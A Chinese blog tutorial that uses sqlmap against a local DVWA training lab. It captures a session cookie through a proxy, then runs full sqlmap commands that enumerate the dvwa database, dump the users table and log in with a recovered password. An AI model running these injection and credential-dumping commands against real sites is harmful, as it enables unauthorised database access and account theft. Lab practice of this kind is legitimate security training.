欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

sqlmap注入

程序员文章站 2022-06-23 09:46:35
用phpstudy 链接 dvwa 搭建一个环境 而后呢,我们要使用抓包软件抓一下dvwa的cookie 让我们先来看一下演示: 首先进入dvwa 将难度设置为low(为了演示方便)...

用phpstudy 链接 dvwa 搭建一个环境

而后呢,我们要使用抓包软件抓一下dvwa的cookie

让我们先来看一下演示:

首先进入dvwa 将难度设置为low(为了演示方便)

sqlmap注入

接着呢 要使用用抓包 抓出dvwa登录时的cookie

首先配置代理,在这里呢 我设置代理端口为默认:8080 如下图所示

sqlmap注入sqlmap注入

打开抓取按钮 刷新页面

可以看到

Cookies为 security=low; PHPSESSID=m04sk2chd2m6k381lcqrjukja4

所以 我们使用cookie 进行爆破测试

打开 sqlmap 让我来一起进行试验

我们有cookie 所以使用cookie方式注入

首先使用命令:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4"

sqlmap注入sqlmap注入

我们可以看到 已经注入成功

接着我们爆出表--->

爆出 dvwa下的表名命令:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4" -D dvwa --tables

sqlmap注入

我们可以看到 dvwa下有 两个表单 一个为guestbook 一个为 users

很明显 users下有我们想要的东西

所以 我们就爆出users下面的字段

使用命令:

C:\Python27\sqlmap>sqlmap.p-u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk

ja4" -D dvwa --tables --dump -T Users

sqlmap注入

喏,这时,我们可以明显看到 users表单中 所爆出来的 账号密码一共有5组,这样 我们随便拿个账号试验一下看能否登录进去

这个长得顺眼 咱们就用这个:

账号为:pablo 密码为:letmein

sqlmap注入sqlmap注入

Ok,成功登入进去